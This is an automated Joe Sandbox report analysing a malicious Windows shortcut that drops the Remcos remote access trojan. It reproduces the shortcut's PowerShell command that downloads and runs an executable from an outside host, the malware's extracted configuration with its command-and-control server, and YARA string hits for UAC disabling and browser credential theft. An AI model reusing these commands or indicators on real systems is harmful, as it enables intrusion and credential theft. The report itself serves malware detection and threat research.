Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MdkbG2pK4l.lnk

Overview

General Information

Sample name:MdkbG2pK4l.lnk
renamed because original name is a hash value
Original sample name:9ee2b12e8974f00111bb9887f7f9e19f.lnk
Analysis ID:1518485
MD5:9ee2b12e8974f00111bb9887f7f9e19f
SHA1:54d2830260e949b25d291c07ebc6d29d8b4f0af8
SHA256:f5734ae475931dbb561fc5b636d5a7825d8d99efa8d4d9cdff7e89bf163613dd
Tags:lnkuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: Suspicious Invoke-WebRequest Execution
Switches to a custom stack to bypass stack traces
Windows shortcut file (LNK) contains suspicious command line arguments
Writes to foreign memory regions
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 4892 cmdline: "C:\Windows\System32\cmd.exe" /c powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe && C:\Users\user\AppData\Roaming/hello.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3652 cmdline: powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
    • hello.exe (PID: 7528 cmdline: C:\Users\user\AppData\Roaming/hello.exe MD5: 25860926414BF43383246F7C773A8D6C)
      • DZIPR.exe (PID: 7580 cmdline: "C:\Users\user\DZIPR.exe" MD5: EC9CE1D67F98072281015C7726FBA245)
        • DZIPR.exe (PID: 7596 cmdline: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe MD5: EC9CE1D67F98072281015C7726FBA245)
          • cmd.exe (PID: 7620 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • explorer.exe (PID: 8164 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • svchost.exe (PID: 7884 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • DZIPR.exe (PID: 8048 cmdline: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe MD5: EC9CE1D67F98072281015C7726FBA245)
    • cmd.exe (PID: 8068 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorer.exe (PID: 4044 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • DZIPR.exe (PID: 2980 cmdline: "C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe" MD5: EC9CE1D67F98072281015C7726FBA245)
    • cmd.exe (PID: 6732 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorer.exe (PID: 2056 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • DZIPR.exe (PID: 5112 cmdline: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe MD5: EC9CE1D67F98072281015C7726FBA245)
    • cmd.exe (PID: 6116 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorer.exe (PID: 1180 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Version": "5.1.1 Pro", "Host:Port:Password": "fullimmersion777.com:8090:0", "Assigned name": "Back-September", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "hello.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "rimcsl-94LESJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\gnqpmvvlbuJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    C:\Users\user\AppData\Local\Temp\gnqpmvvlbuJoeSecurity_RemcosYara detected Remcos RATJoe Security
      C:\Users\user\AppData\Local\Temp\gnqpmvvlbuJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        C:\Users\user\AppData\Local\Temp\gnqpmvvlbuWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6aab8:$a1: Remcos restarted by watchdog!
        • 0x6b030:$a3: %02i:%02i:%02i:%03i
        C:\Users\user\AppData\Local\Temp\gnqpmvvlbuREMCOS_RAT_variantsunknownunknown
        • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
        • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x64b7c:$str_b2: Executing file:
        • 0x65bfc:$str_b3: GetDirectListeningPort
        • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x65728:$str_b7: \update.vbs
        • 0x64ba4:$str_b9: Downloaded file:
        • 0x64b90:$str_b10: Downloading file:
        • 0x64c34:$str_b12: Failed to upload file:
        • 0x65bc4:$str_b13: StartForward
        • 0x65be4:$str_b14: StopForward
        • 0x65680:$str_b15: fso.DeleteFile "
        • 0x65614:$str_b16: On Error Resume Next
        • 0x656b0:$str_b17: fso.DeleteFolder "
        • 0x64c24:$str_b18: Uploaded file:
        • 0x64be4:$str_b19: Unable to delete:
        • 0x65648:$str_b20: while fso.FileExists("
        • 0x650c1:$str_c0: [Firefox StoredLogins not found]
        Click to see the 21 entries
        SourceRuleDescriptionAuthorStrings
        0000001A.00000002.1827195478.00000000005CB000.00000004.00000001.01000000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x14b8:$a1: Remcos restarted by watchdog!
        • 0x1a30:$a3: %02i:%02i:%02i:%03i
        0000001A.00000002.1827230846.00000000005CF000.00000008.00000001.01000000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                Click to see the 70 entries
                SourceRuleDescriptionAuthorStrings
                20.2.cmd.exe.4fb0b57.5.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  20.2.cmd.exe.4fb0b57.5.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                  • 0x1dcbe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                  • 0x1dd49:$s1: CoGetObject
                  • 0x1dca2:$s2: Elevation:Administrator!new:
                  32.2.explorer.exe.55bfb57.5.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    32.2.explorer.exe.55bfb57.5.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                    • 0x1dcbe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    • 0x1dd49:$s1: CoGetObject
                    • 0x1dca2:$s2: Elevation:Administrator!new:
                    24.2.cmd.exe.52ba757.4.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                      Click to see the 98 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe, CommandLine: powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe && C:\Users\user\AppData\Roaming/hello.exe, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4892, ParentProcessName: cmd.exe, ProcessCommandLine: powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe, ProcessId: 3652, ProcessName: powershell.exe
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3652, TargetFilename: C:\Users\user\AppData\Roaming\hello.exe
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\svchost.exe, ProcessId: 7884, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITE1BA.tmp
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe && C:\Users\user\AppData\Roaming/hello.exe, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe && C:\Users\user\AppData\Roaming/hello.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe && C:\Users\user\AppData\Roaming/hello.exe, ProcessId: 4892, ProcessName: cmd.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe, CommandLine: powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe && C:\Users\user\AppData\Roaming/hello.exe, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4892, ParentProcessName: cmd.exe, ProcessCommandLine: powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe, ProcessId: 3652, ProcessName: powershell.exe
                      Source: Process startedAuthor: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative: Data: Command: C:\Windows\SysWOW64\explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\explorer.exe, NewProcessName: C:\Windows\SysWOW64\explorer.exe, OriginalFileName: C:\Windows\SysWOW64\explorer.exe, ParentCommandLine: C:\Windows\SysWOW64\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7620, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\SysWOW64\explorer.exe, ProcessId: 8164, ProcessName: explorer.exe
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7884, ProcessName: svchost.exe
                      No Suricata rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\lejpAvira: detection malicious, Label: BDS/Backdoor.Gen
                      Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbuAvira: detection malicious, Label: BDS/Backdoor.Gen
                      Source: C:\Users\user\AppData\Local\Temp\paogviuraAvira: detection malicious, Label: BDS/Backdoor.Gen
                      Source: C:\Users\user\AppData\Local\Temp\rjhlrgwtAvira: detection malicious, Label: BDS/Backdoor.Gen
                      Source: 20.2.cmd.exe.55000c8.7.raw.unpackMalware Configuration Extractor: Remcos {"Version": "5.1.1 Pro", "Host:Port:Password": "fullimmersion777.com:8090:0", "Assigned name": "Back-September", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "hello.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "rimcsl-94LESJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                      Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbuReversingLabs: Detection: 86%
                      Source: C:\Users\user\AppData\Local\Temp\lejpReversingLabs: Detection: 86%
                      Source: C:\Users\user\AppData\Local\Temp\paogviuraReversingLabs: Detection: 86%
                      Source: C:\Users\user\AppData\Local\Temp\rjhlrgwtReversingLabs: Detection: 86%
                      Source: Yara matchFile source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Local\Temp\lejpJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbuJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\paogviuraJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\rjhlrgwtJoe Sandbox ML: detected
                      Source: MdkbG2pK4l.lnkJoe Sandbox ML: detected
                      Source: cmd.exe, 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_1dcf3d25-f

                      Exploits

                      barindex
                      Source: Yara matchFile source: 20.2.cmd.exe.4fb0b57.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.explorer.exe.55bfb57.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.cmd.exe.52ba757.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.5573a8a.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.DZIPR.exe.35e05ce.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.explorer.exe.4a68a8a.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.DZIPR.exe.359a901.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.55b8b57.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.explorer.exe.55c0757.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.explorer.exe.4aae757.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.explorer.exe.cc8b57.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.explorer.exe.474ab57.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.5199a8a.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.51deb57.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.cmd.exe.4f6ba8a.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.explorer.exe.4705a8a.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.cmd.exe.52b9b57.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.explorer.exe.4aadb57.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.explorer.exe.557aa8a.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.DZIPR.exe.35df9ce.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.cmd.exe.4fb1757.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.cmd.exe.5274a8a.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.explorer.exe.cc9757.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.51df757.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.55b9757.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.explorer.exe.c83a8a.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.explorer.exe.474b757.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.1827055009.00000000005C2000.00000008.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DZIPR.exe PID: 7580, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED
